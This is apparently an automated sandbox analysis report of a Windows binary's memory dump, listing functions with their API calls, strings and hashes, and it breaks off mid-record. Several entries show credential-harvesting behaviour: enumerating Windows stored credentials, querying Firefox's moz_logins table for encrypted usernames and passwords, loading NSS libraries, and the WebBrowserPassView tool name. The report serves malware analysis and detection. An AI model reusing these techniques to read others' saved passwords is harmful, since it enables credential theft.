GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00412F81

Strings

Module32First, xrefs: 00412F48
Module32Next, xrefs: 00412F59
Process32First, xrefs: 00412F6A
kernel32.dll, xrefs: 00412F1F
Process32Next, xrefs: 00412F7B
CreateToolhelp32Snapshot, xrefs: 00412F37

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 9afc599291b44c0031a1a238e792fad3046f96ec859f9be66ee04854d14c5414
Instruction ID: 90193f1111e05c4afbc6439255eabbfb584b4719c6c3eda45dffcf0f008ca331
Opcode Fuzzy Hash: 9afc599291b44c0031a1a238e792fad3046f96ec859f9be66ee04854d14c5414
Instruction Fuzzy Hash: 6BF08B30941321AEAB208F295F40F6729B4E745BCAF140037B404D1655DBE8C453DF7D

Uniqueness

Uniqueness Score: -1.00%

Function 00403B29, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00403BA4: FreeLibrary.KERNEL32(?,00403B31,00000000,00409589,?,00000000,?), ref: 00403BAB

LoadLibraryW.KERNEL32(advapi32.dll,00000000,00409589,?,00000000,?), ref: 00403B36
GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00403B4F
GetProcAddress.KERNEL32(?,CredFree), ref: 00403B5B
GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403B67
GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00403B73
GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403B7F

Strings

CredReadA, xrefs: 00403B49
CredEnumerateA, xrefs: 00403B69
CredFree, xrefs: 00403B51
CredDeleteA, xrefs: 00403B5D
CredEnumerateW, xrefs: 00403B75
advapi32.dll, xrefs: 00403B31

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
API String ID: 2449869053-4258758744
Opcode ID: b35c21cb85061f263d9bcfade7dbfc97ff2743854c4f3c632f847b452f6a88c2
Instruction ID: 8f7743962e36341c748a679f4d1b70e48ab6ec882cd35c5a4d1c5c737e04e9f5
Opcode Fuzzy Hash: b35c21cb85061f263d9bcfade7dbfc97ff2743854c4f3c632f847b452f6a88c2
Instruction Fuzzy Hash: 4F011A34500B419BDB31AF768809E0ABBF4EF94709B20882FE091A3692D6BDB140CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040F99D, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 166windowCOMMON

Download Yara Rule

APIs

SetBkMode.GDI32(?,00000001), ref: 0040FA22
SetTextColor.GDI32(?,00FF0000), ref: 0040FA30
SelectObject.GDI32(?,?), ref: 0040FA45
DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040FA79
SelectObject.GDI32(00000014,00000005), ref: 0040FA85

Part of subcall function 0040F7F1: GetCursorPos.USER32(?), ref: 0040F7FB
Part of subcall function 0040F7F1: GetSubMenu.USER32 ref: 0040F809
Part of subcall function 0040F7F1: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040F83A

GetModuleHandleW.KERNEL32(00000000), ref: 0040FAA0
LoadCursorW.USER32(00000000,00000067), ref: 0040FAA9
SetCursor.USER32(00000000), ref: 0040FAB0
PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040FAF4
memcpy.MSVCRT ref: 0040FB3D

Strings

WebBrowserPassView, xrefs: 0040FABE

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Cursor$MenuObjectSelectText$ColorDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
String ID: WebBrowserPassView
API String ID: 3991541706-2171583229
Opcode ID: af87e28441c52666e05ef975f9e80766b0ecba8b6e67ff3cf46880ee9de98c1b
Instruction ID: d9273dffa9cc4a7b5f3d28471e210e7f23542924c6da0ead56af32090a150d55
Opcode Fuzzy Hash: af87e28441c52666e05ef975f9e80766b0ecba8b6e67ff3cf46880ee9de98c1b
Instruction Fuzzy Hash: 3C51F431600105ABDB34AF64C895B6A77B6BF48310F104137F909AB6E1DB78EC55CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9E8, Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 0040EA07
GetWindowRect.USER32 ref: 0040EA1D
GetWindowRect.USER32 ref: 0040EA33
GetDlgItem.USER32 ref: 0040EA6D
GetWindowRect.USER32 ref: 0040EA74
MapWindowPoints.USER32 ref: 0040EA84
BeginDeferWindowPos.USER32 ref: 0040EAA8
DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040EACB
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040EAEA
DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 0040EB15
DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 0040EB2D
EndDeferWindowPos.USER32(?), ref: 0040EB32

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$Defer$Rect$BeginClientItemPoints
String ID:
API String ID: 552707033-0
Opcode ID: d377f14bac66848249b0c215b625da6d3176a3386a63c890cfc2e0202b3da6cd
Instruction ID: dc3f1f52df5294a2ec978d0ae6c3ccd5c38b38754740f987f7490d1c54cf7de8
Opcode Fuzzy Hash: d377f14bac66848249b0c215b625da6d3176a3386a63c890cfc2e0202b3da6cd
Instruction Fuzzy Hash: 9141B275A00609BFEF11DFA8CD89FEEBBBAFB48304F100465E615A61A0C7716A50DB14

Uniqueness

Uniqueness Score: -1.00%

Function 0040A230, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040A401,?,?,*.*,0040A46B,00000000), ref: 0040A250

Part of subcall function 004089BB: SetFilePointer.KERNEL32(0040A46B,?,00000000,00000000,?,0040A271,00000000,00000000,?,00000020,?,0040A401,?,?,*.*,0040A46B), ref: 004089C8

GetFileSize.KERNEL32(00000000,00000000), ref: 0040A280

Part of subcall function 0040A19F: _memicmp.MSVCRT ref: 0040A1B9
Part of subcall function 0040A19F: memcpy.MSVCRT ref: 0040A1D0

memcpy.MSVCRT ref: 0040A2C7
strchr.MSVCRT ref: 0040A2EC
strchr.MSVCRT ref: 0040A2FD
_strlwr.MSVCRT ref: 0040A30B
memset.MSVCRT ref: 0040A326
CloseHandle.KERNEL32(00000000), ref: 0040A373

Strings

h, xrefs: 0040A2D8
4, xrefs: 0040A274

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
String ID: 4$h
API String ID: 4066021378-1856150674
Opcode ID: 037d5fbce9d0b4662d9ebf7469ceba7c591ab6ee4687e3a1553bf719baa28f42
Instruction ID: 17f5db22f20d9ae327a0934dc0a50b98bc11baf633b6527cb3b89d44c7cb3914
Opcode Fuzzy Hash: 037d5fbce9d0b4662d9ebf7469ceba7c591ab6ee4687e3a1553bf719baa28f42
Instruction Fuzzy Hash: 3D31A271900218BFEB11EBA4CC85FEE77ACEB45354F10406AFA08E6181E7399F558B69

Uniqueness

Uniqueness Score: -1.00%

Function 00413F4B, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413F79
memset.MSVCRT ref: 00413F8E
_snwprintf.MSVCRT ref: 00413FA8
_snwprintf.MSVCRT ref: 00413FC7
memset.MSVCRT ref: 00413FF9
memset.MSVCRT ref: 0041400E
memset.MSVCRT ref: 00414023
_snwprintf.MSVCRT ref: 0041403D
_snwprintf.MSVCRT ref: 0041405A

Strings

%%0.%df, xrefs: 00413F9B, 00414030

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: 006428a89fa05684acf2644298e63651eb7cb4553425473b44fafabdd736af6e
Instruction ID: 0b838db9f825932711660ea6569b586705b9a26b63b1a47a63d1f68ae8ff407c
Opcode Fuzzy Hash: 006428a89fa05684acf2644298e63651eb7cb4553425473b44fafabdd736af6e
Instruction Fuzzy Hash: 86313271900129BBEB20DF55CC85FEB7B7CEF89304F0100EAF509A2112EB789A54CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004055D0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000041,00000064,00000000), ref: 004055F3
KillTimer.USER32(?,00000041), ref: 00405603
KillTimer.USER32(?,00000041), ref: 00405614
GetTickCount.KERNEL32 ref: 00405637
GetParent.USER32(?), ref: 00405662
SendMessageW.USER32(00000000), ref: 00405669
BeginDeferWindowPos.USER32 ref: 00405677
EndDeferWindowPos.USER32(00000000), ref: 004056C7
InvalidateRect.USER32(?,?,00000001), ref: 004056D3

Strings

A, xrefs: 0040561F

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
String ID: A
API String ID: 2892645895-3554254475
Opcode ID: a5eb5b96462c3251e9a860f7e43a9a09c1a522a6715d8b372432c44450ed2e81
Instruction ID: 7dfccb24d1e076f690be31caf06a6d4f547633615caf0f8568b2f3749d1e3a55
Opcode Fuzzy Hash: a5eb5b96462c3251e9a860f7e43a9a09c1a522a6715d8b372432c44450ed2e81
Instruction Fuzzy Hash: 1D317E75640B04BBEB201F659C85F6B7B6AFB44741F50883AF30A7A1E1C7F698908E58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E29C, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E2D4
memset.MSVCRT ref: 0040E2E9
memset.MSVCRT ref: 0040E2FE
_snwprintf.MSVCRT ref: 0040E326
wcscpy.MSVCRT ref: 0040E342
_snwprintf.MSVCRT ref: 0040E385

Strings

<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 0040E378
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040E319
<table dir="rtl"><tr><td>, xrefs: 0040E33C
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 0040E2AC

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: c4fce1170840367a350b3e6d5f67ab6abb67d71c967fae5ab0e812931b85aba3
Instruction ID: dd7614801a102cad1738161c6781c4b5767366b5b9f47406b9b80e8d834f6cb8
Opcode Fuzzy Hash: c4fce1170840367a350b3e6d5f67ab6abb67d71c967fae5ab0e812931b85aba3
Instruction Fuzzy Hash: C82154B69002186BDB21EBA5CC45F9A77BCEF4D785F0440AAF50893151DB38DB848B59

Uniqueness

Uniqueness Score: -1.00%

Function 00413031, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 0041304A
wcscpy.MSVCRT ref: 0041305A

Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EBE
Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EC8
Part of subcall function 00407EAF: _memicmp.MSVCRT ref: 00407EE3

wcscpy.MSVCRT ref: 004130A9
wcscat.MSVCRT ref: 004130B4
memset.MSVCRT ref: 00413090

Part of subcall function 00408463: GetWindowsDirectoryW.KERNEL32(00453718,00000104,?,004130E9,?,?,00000000,00000208,-00000028), ref: 00408479
Part of subcall function 00408463: wcscpy.MSVCRT ref: 00408489

memset.MSVCRT ref: 004130D8
memcpy.MSVCRT ref: 004130F3
wcscat.MSVCRT ref: 004130FF

Strings

\systemroot, xrefs: 00413067

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: f2ab5198b6a2690fa1a836c34b2ef13a361ad9faede40cdf7fdb84fd41dd5d52
Instruction ID: 36f3f6f0360cce9f0c7183545ae4e1e5b3fba08c84210a6b9e93ac32fafd8b1c
Opcode Fuzzy Hash: f2ab5198b6a2690fa1a836c34b2ef13a361ad9faede40cdf7fdb84fd41dd5d52
Instruction Fuzzy Hash: 9A21D7B640530469E721EBB19C86FEB63EC9F46715F20415FB115A2082FB7CAA84475E

Uniqueness

Uniqueness Score: -1.00%

Function 0040744D, Relevance: 16.8, APIs: 10, Strings: 1, Instructions: 251stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00443A61: memset.MSVCRT ref: 00443A8C
Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443AA3
Part of subcall function 00443A61: memset.MSVCRT ref: 00443AD6
Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443AEC
Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443AFD
Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443B23
Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443B34
Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443B5B
Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443B6C
Part of subcall function 00443A61: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B7B
Part of subcall function 00443A61: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B92
Part of subcall function 00443A61: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00443BDF
Part of subcall function 00443A61: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00443BEB

memset.MSVCRT ref: 0040748C

Part of subcall function 00408C5E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,00402A35,?,?), ref: 00408C77

memset.MSVCRT ref: 0040750B
memset.MSVCRT ref: 00407520
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040765C
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407672
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407688
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040769E
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076B4
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076CA
memset.MSVCRT ref: 004076E0

Strings

SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_logins, xrefs: 004074D2

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memsetstrcpy$wcscpy$wcscat$AddressProc$ByteCharHandleLibraryLoadModuleMultiWide
String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_logins
API String ID: 2096775815-1337997248
Opcode ID: 2e12d6ea0480d97641cb46f238cf2080cd592d40d485f85ffcf83cfd2d87e7a7
Instruction ID: 3c2b171134edc849c89bfde98875369ff40149e6fc896e2c8c158776e68e1888
Opcode Fuzzy Hash: 2e12d6ea0480d97641cb46f238cf2080cd592d40d485f85ffcf83cfd2d87e7a7
Instruction Fuzzy Hash: 61912A72C0425EAFDF10DF94DC819DEBBB4EF04315F10406BE505B2191EA39AA94CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00417F9B, Relevance: 16.6, APIs: 11, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9

GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00417FC7
malloc.MSVCRT ref: 00417FD2
free.MSVCRT(?), ref: 00417FE2
GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00417FF6
free.MSVCRT(?), ref: 00417FFB
GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00418011
malloc.MSVCRT ref: 00418019
GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 0041802C
free.MSVCRT(?), ref: 00418031
free.MSVCRT(?), ref: 00418045
free.MSVCRT(00000000,0044C838,00000000), ref: 00418064

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free$FullNamePath$malloc$Version
String ID:
API String ID: 3356672799-0
Opcode ID: 4281f6dcf499aebe880315d56d8890ea297e638ba0a2e688ee01e2e55a4b7441
Instruction ID: e19f7d1979d0248284e652c075024004b82b0c137a295abbe9fd7512c3376d02
Opcode Fuzzy Hash: 4281f6dcf499aebe880315d56d8890ea297e638ba0a2e688ee01e2e55a4b7441
Instruction Fuzzy Hash: AA218675904118BFEF10BBA5EC46CDF7FB9DF41398B22016BF404A2161DE395E819968

Uniqueness

Uniqueness Score: -1.00%

Function 00407F9A, Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 00407FA4

Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D

GetFileSize.KERNEL32(00000000,00000000), ref: 00407FC1
GlobalAlloc.KERNEL32(00002000,00000002), ref: 00407FD2
GlobalLock.KERNEL32 ref: 00407FDF
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407FF2
GlobalUnlock.KERNEL32(00000000), ref: 00408004
SetClipboardData.USER32 ref: 0040800D
GetLastError.KERNEL32 ref: 00408015
CloseHandle.KERNEL32(?), ref: 00408021
GetLastError.KERNEL32 ref: 0040802C
CloseClipboard.USER32 ref: 00408035

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
String ID:
API String ID: 3604893535-0
Opcode ID: df7f886e945f591bfda75065e4edf3e41638ed4f771c2343fc9f9f7254ae204e
Instruction ID: 9cea1fd89fc17267dcd3af91661d4008ede421ba1dc4d9805cb8839a0273d96b
Opcode Fuzzy Hash: df7f886e945f591bfda75065e4edf3e41638ed4f771c2343fc9f9f7254ae204e
Instruction Fuzzy Hash: 71113D7A900A04FBDF105FB0ED4CB9E7BB8EB45365F100176F942E52A2DB748904DB68

Uniqueness

Uniqueness Score: -1.00%

Function 004144DA, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 0041454D

Strings

Startup, xrefs: 00414505
Common Start Menu, xrefs: 0041451A
Desktop, xrefs: 004144F7
Favorites, xrefs: 0041450C
AppData, xrefs: 00414532
Programs, xrefs: 00414513
Common Programs, xrefs: 00414547
Common Desktop, xrefs: 00414539
Common Startup, xrefs: 00414540
Start Menu, xrefs: 004144FE

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscpy
String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
API String ID: 1284135714-318151290
Opcode ID: bfadb20ff740d820eb56dcb57501d1229147ac2dc18d3832aa90891d3b4f6c13
Instruction ID: 0ebae4f713cd0728fe49c3fef23c10be13eea51f6af137ba8aced86fbfd041bd
Opcode Fuzzy Hash: bfadb20ff740d820eb56dcb57501d1229147ac2dc18d3832aa90891d3b4f6c13
Instruction Fuzzy Hash: 59F0BBB169462D73342E25B85806AF70483F0C1B0537E45537702EA6D6EA4CCAC1E89F

Uniqueness

Uniqueness Score: -1.00%

Function 0040B478, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 0040B48E
memset.MSVCRT ref: 0040B4B2
GetMenuItemInfoW.USER32 ref: 0040B4ED
memset.MSVCRT ref: 0040B51C
wcschr.MSVCRT ref: 0040B528
wcscat.MSVCRT ref: 0040B583
ModifyMenuW.USER32(?,?,00000400,?,?), ref: 0040B59F

Strings

6, xrefs: 0040B4D8
0, xrefs: 0040B4CD

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
String ID: 0$6
API String ID: 4066108131-3849865405
Opcode ID: b79568a4bc0d31f153f724f739672314f24d182ceeaf87f3ebd535909d0644a4
Instruction ID: bceec671b1c8862383177497c079c71e13407bcb6d3a60011dae78a89f936b1e
Opcode Fuzzy Hash: b79568a4bc0d31f153f724f739672314f24d182ceeaf87f3ebd535909d0644a4
Instruction Fuzzy Hash: 65315BB2408340AFDB109F95DC44A9BB7E8FF89318F00487FF948A2291D779D905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00403C8C, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CAB
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403CBD
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CD1
#17.COMCTL32(?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CDF
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403CFC

Strings

comctl32.dll, xrefs: 00403C94
InitCommonControlsEx, xrefs: 00403CB7
Error: Cannot load the common control classes., xrefs: 00403CF6
Error, xrefs: 00403CF1

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 66f0956d2bdd33e57a9d75159f698099ad879889c70df319cc2ace5e9580e212
Instruction ID: 34266bbb316567afe830504356b8b6584aa457591d2bf79f0dcd5bedfca56d80
Opcode Fuzzy Hash: 66f0956d2bdd33e57a9d75159f698099ad879889c70df319cc2ace5e9580e212
Instruction Fuzzy Hash: B801D676754B116BEB215F649C89B6B7D9CEF42B4AB004039F502F2181DAB8DE0196A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041171B, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,747857F0,00411871,?,?,?,?,?,00000000), ref: 0041172A
GetModuleHandleW.KERNEL32(sqlite3.dll,?,747857F0,00411871,?,?,?,?,?,00000000), ref: 00411733
GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,747857F0,00411871,?,?,?,?,?,00000000), ref: 0041173C
FreeLibrary.KERNEL32(00000000,?,747857F0,00411871,?,?,?,?,?,00000000), ref: 0041174B
FreeLibrary.KERNEL32(00000000,?,747857F0,00411871,?,?,?,?,?,00000000), ref: 00411752
FreeLibrary.KERNEL32(00000000,?,747857F0,00411871,?,?,?,?,?,00000000), ref: 00411759

Strings

nss3.dll, xrefs: 00411725
sqlite3.dll, xrefs: 0041172C
mozsqlite3.dll, xrefs: 00411735

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHandleLibraryModule
String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
API String ID: 662261464-3550686275
Opcode ID: 0ba152906d568cc671e1b6f9d2e794e6ae63ac90640bfd5e0f9cb05d093c3698
Instruction ID: e2ab39130582ef49d5f09875a9cbab8dc3c3c45014a759ddc4c6379760142a6f
Opcode Fuzzy Hash: 0ba152906d568cc671e1b6f9d2e794e6ae63ac90640bfd5e0f9cb05d093c3698
Instruction Fuzzy Hash: 7AE04F66F4136DA79A1027F66C84EAB6F5CC896AA13150037AF05A33519EA89C018AF9

Uniqueness

Uniqueness Score: -1.00%

Function 004440EA, Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 00444125
memcpy.MSVCRT ref: 004441C9
memcpy.MSVCRT ref: 004441DB
memcpy.MSVCRT ref: 00444203
memcpy.MSVCRT ref: 00444215
memcpy.MSVCRT ref: 00444227
memcpy.MSVCRT ref: 00444276
memset.MSVCRT ref: 004442C4

Strings

UCD, xrefs: 00444272, 0044427E, 00444275, 00444281
UCD, xrefs: 00444117, 004442DE, 0044414D, 00444197, 0044411F

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memchrmemset
String ID: UCD$UCD
API String ID: 1581201632-670880344
Opcode ID: 466d59214c80b3bca22488233ffa0f6a545d692d30eb3385f305033defd9c4bb
Instruction ID: 346eebee7d7e8b6f8d140da3993cfc901939ed9edb34b9035315ebb9ce6523fc
Opcode Fuzzy Hash: 466d59214c80b3bca22488233ffa0f6a545d692d30eb3385f305033defd9c4bb
Instruction Fuzzy Hash: 8551D3719001195BEB10EFA8CC95FEEB7B8AF85300F0444ABF955E7281E778E644CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004085D0, Relevance: 15.1, APIs: 10, Instructions: 103COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004085E9
GetSystemMetrics.USER32 ref: 004085EF
GetDC.USER32(00000000), ref: 004085FC
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040860D
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408614
ReleaseDC.USER32 ref: 0040861B
GetWindowRect.USER32 ref: 0040862E
GetParent.USER32(?), ref: 00408633
GetWindowRect.USER32 ref: 00408650
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004086AF

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: f1fece8f71670097fa47147ff3162736aa5b7fc67ad6ee2a4cdb5b150032ca2b
Instruction ID: 6b5921239ffcae24bde8aad05d59603f054fe97e3a0e5988cf4f66e7c2dd28aa
Opcode Fuzzy Hash: f1fece8f71670097fa47147ff3162736aa5b7fc67ad6ee2a4cdb5b150032ca2b
Instruction Fuzzy Hash: 2E31A475A00609AFDF04CFB8CD85AEEBBB9FB48350F050539E901F3291DA71ED418A94

Uniqueness

Uniqueness Score: -1.00%

Function 00402D82, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00402D91
abs.MSVCRT ref: 00402E9A
abs.MSVCRT ref: 00402ECC
log.MSVCRT ref: 00402F7D
log.MSVCRT ref: 00402F8F
free.MSVCRT(?), ref: 00402FB1
free.MSVCRT(?), ref: 00402FC5

Strings

, xrefs: 00402DBF

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free$wcslen
String ID:
API String ID: 3592753638-3916222277
Opcode ID: 490489ed51bc5752fe94a4990fd5cd344a627c9c2c9d2179b2f34b9e7a32eba5
Instruction ID: 99c2379fcd531e162887146704610c03ee1d54022b9859d6cf2ce1b1ac3fe7c7
